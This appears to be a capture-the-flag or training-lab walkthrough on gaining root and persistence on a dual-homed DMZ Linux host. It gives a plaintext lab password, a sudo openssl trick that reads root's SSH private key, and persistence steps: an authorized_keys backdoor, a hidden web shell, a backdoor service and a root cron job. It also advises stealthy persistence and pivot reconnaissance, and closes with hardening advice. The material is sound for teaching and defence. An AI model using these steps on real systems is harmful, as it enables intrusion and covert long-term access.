Post-exploitation persistence ensures stable access after hard-fought initial compromise. Transform unstable reverse shells into persistent SSH access, escalate to root privileges, and establish reliable pivot points for internal Active Directory attacks.
# Leverage discovered credentials for stable access
ssh srvadm@TARGET_IP
Password: ILFreightnixadm!
# Benefits of SSH over reverse shells:
- Stable connection (no timeouts)
- Daily access restoration capability
- Efficient tunneling/pivoting setup
- Professional testing workflow
- Backup access method# Network interface analysis
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-113-generic x86_64)
System information as of [DATE]:
IPv4 address for br-65c448355ed2: 172.18.0.1 # Docker bridge
IPv4 address for docker0: 172.17.0.1 # Docker default
IPv4 address for ens160: 10.129.203.111 # External interface
IPv4 address for ens192: 172.16.8.120 # Internal AD network
# Key observations:
- DMZ positioning with dual interfaces
- Docker environment present
- Internal network connectivity confirmed
- Pivot opportunity into 172.16.8.0/23 scope# Standard privilege escalation checks
id
# Output: uid=1003(srvadm) gid=1003(srvadm) groups=1003(srvadm)
# Sudo privileges enumeration
sudo -l
# Result:
User srvadm may run the following commands on dmz01:
(ALL) NOPASSWD: /usr/bin/openssl# GTFOBins reference: https://gtfobins.github.io/gtfobins/openssl/
# Privileged file read capability
# Target: Root SSH private key
LFILE=/root/.ssh/id_rsa
sudo /usr/bin/openssl enc -in $LFILE
# Expected output:
-----BEGIN OPENSSH PRIVATE KEY-----
[BASE64_ENCODED_PRIVATE_KEY]
-----END OPENSSH PRIVATE KEY-----# 1. Save extracted private key locally
cat > dmz01_root_key << 'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
[EXTRACTED_PRIVATE_KEY_CONTENT]
-----END OPENSSH PRIVATE KEY-----
EOF
# 2. Set proper permissions
chmod 600 dmz01_root_key
# 3. Test root SSH access
ssh -i dmz01_root_key root@TARGET_IP
# 4. Verify root privileges
root@dmz01:~# id
uid=0(root) gid=0(root) groups=0(root)# Stable SSH access provides:
- Immediate daily access restoration
- No complex exploitation chain repetition
- Reliable tunneling/pivoting capabilities
- Professional assessment efficiency
- Backup access redundancy
# Root privileges enable:
- Complete system control
- Advanced persistence mechanisms
- Network configuration access
- Internal reconnaissance capabilities
- Pivot infrastructure deployment# SSH key deployment (if no existing keys):
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
# Backdoor web shell placement:
cp webshell.php /var/www/html/.hidden/
chown www-data:www-data /var/www/html/.hidden/webshell.php
# Service manipulation:
systemctl enable custom-backdoor.service
systemctl start custom-backdoor.service
# Scheduled task persistence:
echo "* * * * * root /tmp/.backdoor" >> /etc/crontab# Network topology understanding:
External Network (10.129.x.x) → DMZ (dmz01) → Internal Network (172.16.8.0/23)
# Host role identification:
- Web services hosting (monitoring, dev applications)
- Network boundary device
- Dual-homed system (external + internal)
- Pivot point into corporate environment
# Service enumeration:
ps aux | grep -v "]" # Running services
netstat -antup # Network connections
systemctl list-units --type=service # System services# Network discovery preparation:
ip route # Routing table analysis
arp -a # ARP table enumeration
cat /etc/resolv.conf # DNS configuration
cat /etc/hosts # Static host entries
# Pivot planning:
- SSH tunneling capabilities
- Port forwarding setup
- SOCKS proxy configuration
- Internal reconnaissance staging# Best practices:
- Save private keys securely (encrypted storage)
- Document access credentials
- Test backup access methods
- Monitor for account changes
- Plan for credential rotation
# Risk mitigation:
- Use non-obvious persistence methods
- Avoid high-visibility modifications
- Clean up temporary files
- Document all system changes# Pre-pivot requirements:
✅ Stable SSH access established
✅ Root privileges confirmed
✅ Network interfaces mapped
✅ Internal network connectivity verified
✅ Backup access methods deployed
# Next phase preparation:
- Internal network scanning
- Active Directory enumeration
- Domain controller identification
- Service account discovery
- Lateral movement planning# Persistence establishment chain:
1. SSH connection → srvadm:ILFreightnixadm!
2. Sudo enumeration → /usr/bin/openssl NOPASSWD
3. GTFOBin exploitation → privileged file read
4. SSH key extraction → /root/.ssh/id_rsa
5. Root access establishment → stable persistence
6. Flag retrieval → /root/flag.txt
# Key techniques demonstrated:
- Credential reuse for stable access
- GTFOBins privilege escalation
- SSH key-based persistence
- Professional access maintenance# Technical skills:
- GTFOBins exploitation techniques
- SSH key-based persistence methods
- Privilege escalation validation
- Network position assessment
# Professional methodology:
- Stable access prioritization
- Backup access planning
- Documentation standards
- Operational security practices
# Real-world application:
- DMZ compromise scenarios
- Persistence in enterprise environments
- Internal network pivot preparation
- Long-term access maintenance# Sudo configuration:
- Remove unnecessary NOPASSWD entries
- Implement least privilege principles
- Regular sudo access audits
- Command logging and monitoring
# SSH security:
- Disable root SSH access
- Implement key-based authentication only
- Use SSH certificates instead of keys
- Monitor SSH access logs
# File system protection:
- Restrict access to sensitive files
- Implement file integrity monitoring
- Regular permission audits
- Secure backup storage